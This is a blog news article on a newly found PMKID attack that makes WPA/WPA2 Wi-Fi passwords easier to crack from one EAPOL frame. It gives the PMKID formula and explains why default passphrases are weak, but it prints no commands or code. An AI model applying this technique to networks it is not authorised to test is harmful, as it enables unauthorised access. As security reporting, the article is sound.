New Technique Makes Hacking WPA/WPA2 Even Easier

  • 4.7K
  •  
  •  
  • 523
  •  
  •  
  •  
    5.2K
    Shares

A new technique has been discovered by a developer named Jens “atom” Steube that allows him to easily retrieve the Pairwise Master Key Identifier (PMKID) from a user’s router if it uses WPA/WPA2 security standards.

The above method can be used to crack the WiFi password of a router that is running the latest IEEE standard frequency. Older methods require the capture of the full authentication handshake wheras this new exploit only requires a single frame which can be easily obtained from the Access Point.

This attack was found accidentally while looking for new ways to attack the new WPA3 security standard. WPA3 would be much harder to attack because of its modern key verification protocol called “Simultaneous Authentication of Equals” (SAE).

What’s the difference this and existing handshake attacks?

The main distinction from existing attacks is that in this attack, a capture of a full EAPOL 4-way handshake is not required. The new attack is made on the RSN IE (Robust Security Network Information Element) of a single EAPOL frame.

The new method also reduces the time taken by the script to crack the password

“In fact, many users don’t have the technical knowledge to change the PSK on their routers,” Steube told BleepingComputer. “They continue to use the manufacturer generated PSK and this makes attacking WPA feasible on a large group of WPA users.”

How does it work?

The hack extracts the RSN IE (Robust Security Network Information Element) from a single EAPOL frame. The RSN IE is the optional field that acts as the container to the Pairwise Master Key identifier (PMKID) which is created by the router when a user tries to connect to the WiFi network.

The PMK plays an important part in the 4-way handshake that is used to authenticate both the client and router known Pre-Shared Key (PSK) or the wireless password of the network.

“The PMKID is computed by using HMAC-SHA1 where the key is the PMK and the data part is the concatenation of a fixed string label “PMK Name”, the access point’s MAC address and the station’s MAC address,” stated Steube’s post on this new method.

An overview of the technical Details

A Wireshark screenshot shows that the RSN IE is an optional field that can be found in 802.11 management frames. One of the RSN capabilities is the PMKID.

New Technique Makes Hacking WPA/WPA2 Even Easier

The PMKID uses HMAC-SHA1 where the key is the PMK and the data part is the concatenation of a fixed string label “PMK Name”, the access point’s MAC address and the station’s MAC address as shown below:

PMKID = HMAC-SHA1-128(PMK, “PMK Name” | MAC_AP | MAC_STA)

Read the full technical details HERE

What tools will I need to reproduce this?

In order to make use of this new attack you will need the following tools:

How many routers are affected by this issue?

At Present, we don’t know for which vendors or for how many routers this hack will work, however many experts believe it will work against all 802.11i/p/q/r networks with roaming functions enabled… essentially most modern routers.

Learn more about WiFi Security

If you would like learn all about WiFi ethical hacking from the ground up, we have a 7.5 hour online course with a totally bonkers discount. Get it HERE.

The following two tabs change content below.
I am a programmer and tech enthusiast who loves to use my creative skills to solve complex problems. I also love to stay abreast of what is happening in the world of technology, reach me at: [email protected]

Harikrishna Mekala

I am a programmer and tech enthusiast who loves to use my creative skills to solve complex problems. I also love to stay abreast of what is happening in the world of technology, reach me at: [email protected]

Do NOT follow this link or you will be banned from the site!

Privacy Preference Center

Necessary

The __cfduid cookie is used to identify individual clients behind a shared IP address and apply security settings on a per-client basis.

cookie_notice_accepted and gdpr[allowed_cookies] are used to identify the choices made from the user regarding cookie consent.

For example, if a visitor is in a coffee shop where there may be several infected machines, but the specific visitor's machine is trusted (for example, because they completed a challenge within your Challenge Passage period), the cookie allows Cloudflare to identify that client and not challenge them again. It does not correspond to any user ID in your web application, and does not store any personally identifiable information.

__cfduid, cookie_notice_accepted, gdpr[allowed_cookies]

Advertising

DoubleClick by Google refers to the DoubleClick Digital Marketing platform which is a separate division within Google. This is Google’s most advanced advertising tools set, which includes five interconnected platform components.

DoubleClick Campaign Manager: the ad-serving platform, called an Ad Server, that delivers ads to your customers and measures all online advertising, even across screens and channels.

DoubleClick Bid Manager – the programmatic bidding platform for bidding on high-quality ad inventory from more than 47 ad marketplaces including Google Display Network.

DoubleClick Ad Exchange: the world’s largest ad marketplace for purchasing display, video, mobile, Search and even Facebook inventory.

DoubleClick Search: is more powerful than AdWords and used for purchasing search ads across Google, Yahoo, and Bing.

DoubleClick Creative Solutions: for designing, delivering and measuring rich media (video) ads, interactive and expandable ads.

doubleclick

Analytics

The _ga is asssociated with Google Universal Analytics - which is a significant update to Google's more commonly used analytics service. This cookie is used to distinguish unique users by assigning a randomly generated number as a client identifier. It is included in each page request in a site and used to calculate visitor, session and campaign data for the sites analytics reports. By default it is set to expire after 2 years, although this is customisable by website owners.

The _gat global object is used to create and retrieve tracker objects, from which all other methods are invoked. Therefore the methods in this list should be run only off a tracker object created using the _gat global variable. All other methods should be called using the _gaq global object for asynchronous tracking.

_gid works as a user navigates between web pages, they can use the gtag.js tagging library to record information about the page the user has seen (for example, the page's URL) in Google Analytics. The gtag.js tagging library uses HTTP Cookies to "remember" the user's previous interactions with the web pages.

_ga, _gat, _gid